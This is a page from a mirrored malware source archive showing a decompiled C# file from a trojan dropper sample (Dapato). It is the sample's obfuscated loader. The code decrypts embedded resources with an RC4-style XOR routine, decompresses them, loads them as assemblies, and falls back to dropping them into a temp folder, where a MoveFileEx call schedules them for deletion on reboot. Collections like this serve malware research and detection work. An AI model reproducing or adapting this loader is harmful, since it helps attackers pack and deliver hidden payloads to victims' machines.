ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4b9382ddbc
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5/_000E.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

442 lines
11 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: ss20, Version=1.1.1.1, Culture=neutral, PublicKeyToken=null
// MVID: 4385E1A7-2FA8-4895-8952-90E8ECDFEF6F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5.exe
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
internal static class \u000E
{
internal static void \u0002() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u000E.\u0002);
[MethodImpl(MethodImplOptions.NoInlining)]
private static Assembly \u0002(object _param0, ResolveEventArgs _param1)
{
string str1 = new \u000E.\u0002(_param1.Name).\u0002(false);
if (true)
goto label_38;
label_1:
string s1;
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s1));
if (true)
goto label_39;
label_2:
string str2 = \u000F.\u0002(-1181139859);
if (true)
goto label_40;
label_3:
string str3;
string str4 = str3;
char[] chArray1 = new char[1];
if (true)
goto label_41;
label_4:
char[] chArray2;
chArray2[0] = ',';
char[] chArray3 = chArray2;
string[] strArray1 = str4.Split(chArray3);
if (true)
goto label_42;
label_5:
if (true)
goto label_43;
label_6:
if (true)
goto label_44;
label_7:
if (true)
goto label_45;
label_8:
string str5 = (string) null;
string s2 = (string) null;
string[] strArray2;
string str6;
bool flag1;
bool flag2;
bool flag3;
for (int index = 0; index < strArray2.Length; index += 3)
{
if (strArray2[index].Equals(str6, StringComparison.Ordinal))
{
str5 = strArray2[index + 1];
s2 = strArray2[index + 2];
int length = str5.IndexOf('|');
if (length >= 0)
{
string str7 = str5.Substring(0, length);
str5 = str5.Substring(length + 1);
flag1 = str7.IndexOf('a') != -1;
flag2 = str7.IndexOf('b') != -1;
flag3 = str7.IndexOf('c') != -1;
break;
}
break;
}
}
if (str5 == null)
return (Assembly) null;
Dictionary<string, Assembly> dictionary = \u000E.\u0003.\u0002;
Assembly assembly;
lock (dictionary)
{
if (!dictionary.TryGetValue(str5, out assembly))
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str5);
if (manifestResourceStream == null)
return (Assembly) null;
int length1 = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length1];
manifestResourceStream.Read(numArray, 0, length1);
manifestResourceStream.Dispose();
if (flag1)
numArray = \u000E.\u0003(numArray);
if (flag2)
numArray = \u000E.\u0002(numArray);
int length2 = numArray.Length;
byte[] bytes = Convert.FromBase64String(s2);
string path2 = Encoding.UTF8.GetString(bytes, 0, bytes.Length);
if (!flag3)
{
try
{
assembly = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag3 = true;
}
catch (BadImageFormatException ex)
{
flag3 = true;
}
}
if (flag3)
{
try
{
string str8 = Path.Combine(Path.GetTempPath(), str5);
Directory.CreateDirectory(str8);
string str9 = Path.Combine(str8, path2);
if (!File.Exists(str9))
{
Stream stream = (Stream) File.Create(str9);
stream.Write(numArray, 0, length2);
stream.Dispose();
try
{
\u000E.\u0002(str9, (string) null, 4);
\u000E.\u0002(str8, (string) null, 4);
}
catch
{
}
}
assembly = Assembly.LoadFrom(str9);
}
catch
{
}
}
dictionary.Add(str5, assembly);
}
}
return assembly;
label_45:
flag3 = false;
goto label_8;
label_44:
flag2 = false;
goto label_7;
label_43:
flag1 = false;
goto label_6;
label_42:
strArray2 = strArray1;
goto label_5;
label_41:
chArray2 = chArray1;
goto label_4;
label_40:
str3 = str2;
goto label_3;
label_39:
str6 = base64String;
goto label_2;
label_38:
s1 = str1;
goto label_1;
}
private static int \u0002(byte[] _param0, int _param1)
{
byte[] numArray = _param0;
if (true)
;
int index = _param1;
return (int) numArray[index] | (int) _param0[_param1 + 1] << 24 | (int) _param0[_param1 + 2] << 8 | (int) _param0[_param1 + 3] << 16;
}
private static byte[] \u0002(byte[] _param0)
{
int num1 = \u000E.\u0002(_param0, 0);
if (true)
goto label_6;
label_1:
int num2;
if (num2 != -1686991929)
throw new Exception();
int num3 = \u000E.\u0002(_param0, 4);
if (true)
goto label_7;
label_4:
MemoryStream memoryStream = new MemoryStream(_param0, false);
if (true)
goto label_8;
label_5:
Stream stream1;
stream1.Position = 8L;
Stream stream2 = (Stream) new DeflateStream(stream1, CompressionMode.Decompress);
int count;
_param0 = new byte[count];
stream2.Read(_param0, 0, count);
return _param0;
label_8:
stream1 = (Stream) memoryStream;
goto label_5;
label_7:
count = num3;
goto label_4;
label_6:
num2 = num1;
goto label_1;
}
[MethodImpl(MethodImplOptions.NoInlining)]
private static byte[] \u0003(byte[] _param0)
{
string str = \u000F.\u0002(-1181139719);
if (true)
goto label_11;
label_1:
string s;
byte[] numArray1 = Convert.FromBase64String(s);
if (true)
goto label_12;
label_2:
byte[] numArray2;
\u0003\u2000.\u0002(numArray2);
\u000E.\u0005 obj1 = new \u000E.\u0005(numArray2);
if (true)
goto label_13;
label_3:
int length = _param0.Length;
byte num1 = 0;
byte num2 = 121;
byte[] numArray3 = new byte[8]
{
(byte) 148,
(byte) 68,
(byte) 208,
(byte) 52,
(byte) 241,
(byte) 93,
(byte) 195,
(byte) 220
};
\u000E.\u0005 obj2;
for (int index = 0; index != length; ++index)
{
if (num1 == (byte) 0)
num2 = obj2.\u0002();
++num1;
if (num1 == (byte) 32)
num1 = (byte) 0;
_param0[index] ^= (byte) ((uint) num2 ^ (uint) numArray3[index >> 2 & 3] ^ (uint) numArray3[(int) num1 & 3]);
}
return _param0;
label_13:
obj2 = obj1;
goto label_3;
label_12:
numArray2 = numArray1;
goto label_2;
label_11:
s = str;
goto label_1;
}
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
private static extern bool \u0002(string _param0, string _param1, int _param2);
private struct \u0002
{
public Version \u0002;
public string \u0003;
public string \u0005;
public string \u0008;
public \u0002(string _param1)
{
Version version = new Version();
if (true)
goto label_15;
label_1:
string empty = string.Empty;
if (true)
goto label_16;
label_2:
if (true)
goto label_17;
label_3:
this.\u0008 = (string) null;
string str1 = _param1;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith(\u000F.\u0002(-1181139052), StringComparison.Ordinal))
this.\u0002 = new Version(str3.Substring(\u000F.\u0002(-1181139052).Length));
else if (str3.StartsWith(\u000F.\u0002(-1181138971), StringComparison.Ordinal))
{
this.\u0005 = str3.Substring(\u000F.\u0002(-1181138971).Length);
if (this.\u0005 == \u000F.\u0002(-1181138954))
this.\u0005 = (string) null;
}
else if (str3.StartsWith(\u000F.\u0002(-1181139000), StringComparison.Ordinal))
{
this.\u0008 = str3.Substring(\u000F.\u0002(-1181139000).Length);
if (this.\u0008 == \u000F.\u0002(-1181138990))
this.\u0008 = (string) null;
}
else
this.\u0003 = str3;
}
return;
label_17:
this.\u0005 = (string) null;
goto label_3;
label_16:
this.\u0003 = empty;
goto label_2;
label_15:
this.\u0002 = version;
goto label_1;
}
public string \u0002(bool _param1)
{
StringBuilder stringBuilder1 = new StringBuilder();
if (true)
goto label_4;
label_1:
StringBuilder stringBuilder2;
stringBuilder2.Append(this.\u0003);
if (_param1)
stringBuilder2.Append(\u000F.\u0002(-1181139929)).Append((object) this.\u0002);
stringBuilder2.Append(\u000F.\u0002(-1181139914)).Append(this.\u0005 ?? \u000F.\u0002(-1181138954)).Append(\u000F.\u0002(-1181139963)).Append(this.\u0008 ?? \u000F.\u0002(-1181138990));
return stringBuilder2.ToString();
label_4:
stringBuilder2 = stringBuilder1;
goto label_1;
}
}
private static class \u0003
{
internal static readonly Dictionary<string, Assembly> \u0002;
static \u0003()
{
Dictionary<string, Assembly> dictionary = new Dictionary<string, Assembly>((IEqualityComparer<string>) StringComparer.Ordinal);
if (false)
return;
\u000E.\u0003.\u0002 = dictionary;
}
}
private sealed class \u0005
{
private byte[] \u0002;
private int \u0003;
private int \u0005;
public \u0005(byte[] _param1)
{
byte[] numArray = new byte[256];
if (true)
goto label_9;
label_1:
// ISSUE: explicit constructor call
base.\u002Ector();
int length = _param1.Length;
if (true)
goto label_10;
label_2:
if (true)
goto label_11;
label_5:
for (; this.\u0003 < 256; ++this.\u0003)
this.\u0002[this.\u0003] = (byte) this.\u0003;
int num;
for (this.\u0003 = this.\u0005 = 0; this.\u0003 < 256; ++this.\u0003)
{
this.\u0005 = this.\u0005 + (int) _param1[this.\u0003 % num] + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
this.\u0002(this.\u0003, this.\u0005);
}
return;
label_11:
this.\u0003 = 0;
goto label_5;
label_10:
num = length;
goto label_2;
label_9:
this.\u0002 = numArray;
goto label_1;
}
private void \u0002(int _param1, int _param2)
{
int num1 = (int) this.\u0002[_param1];
if (true)
goto label_2;
label_1:
this.\u0002[_param1] = this.\u0002[_param2];
byte num2;
this.\u0002[_param2] = num2;
return;
label_2:
num2 = (byte) num1;
goto label_1;
}
public byte \u0002()
{
int num1 = this.\u0003 + 1 & (int) byte.MaxValue;
if (true)
goto label_3;
label_1:
int num2 = this.\u0005 + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
if (true)
goto label_4;
label_2:
this.\u0002(this.\u0003, this.\u0005);
return this.\u0002[(int) (byte) ((uint) this.\u0002[this.\u0003] + (uint) this.\u0002[this.\u0005])];
label_4:
this.\u0005 = num2;
goto label_2;
label_3:
this.\u0003 = num1;
goto label_1;
}
}
}
Reference in New Issue View Git Blame Copy Permalink